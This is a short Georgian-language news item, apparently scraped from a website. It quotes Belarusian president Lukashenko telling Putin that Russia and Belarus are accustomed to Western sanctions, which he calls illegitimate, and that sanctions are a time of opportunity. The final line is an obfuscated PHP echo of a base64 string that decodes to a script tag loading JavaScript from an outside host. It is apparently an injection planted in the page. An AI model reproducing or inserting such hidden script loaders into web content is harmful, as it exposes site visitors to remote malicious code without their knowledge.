celsiusi
ავერსი საქკაბელი
ბელარუსის პრეზიდენტმა ალექსანდრ ლუკაშენკომ მოსკოვში ვლადიმერ პუტინთან ორმხრივი შეხვედრის დაწყებისას განაცხადა, რომ რუსეთის ფედერაცია და ბელარუსი, მუდმივად სანქციების ქვეშ ყოფნას შეჩვეულნი არიან.
 
"მართალია, დღეს ისინი უფრო მასშტაბურია, თუმცა ჩვენ დასავლეთის ამ ღორობას უკვე მიჩვეული ვართ, რატომ ღორობას? იმიტომ, რომ ისინი არალეგიტიმურია, ეს ყველაფერი უკანონოა ყველა საერთაშორისო შეთანხმებისა და ხელშეკრულების დარღვევით, რომლებზეც ჩვენც და მათაც ხელი გვაქვს მოწერილი. ჩემი თვალსაზრისით, ეს არის უბრალოდ ღორობა. მე უკვე საკმარისად ვითმინე ეს და თქვენც. როდესაც თქვენთან ამოვდიოდი, ჟურნალისტები მეკითხებოდნენ, გადავიტანთ სანქციებს თუ არა. მისმინეთ, დღეს საკითხი ასე არ დგას. დღეს ჩვენთვის სანქციები არის შესაძლებლობების დრო. მე საბჭოთა ადამიანი ვარ. თქვენც საბჭოთა პერიოდიდან კარგად იცით, ჩვენ მაშინ ყოველთვის ვიყავით სანქციების ქვეშ და ნორმალურად ვცხოვრობდით და ვვითარდებოდით“, – განაცხადა ალექსანდრ ლუკაშენკომ.
 
 
888
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");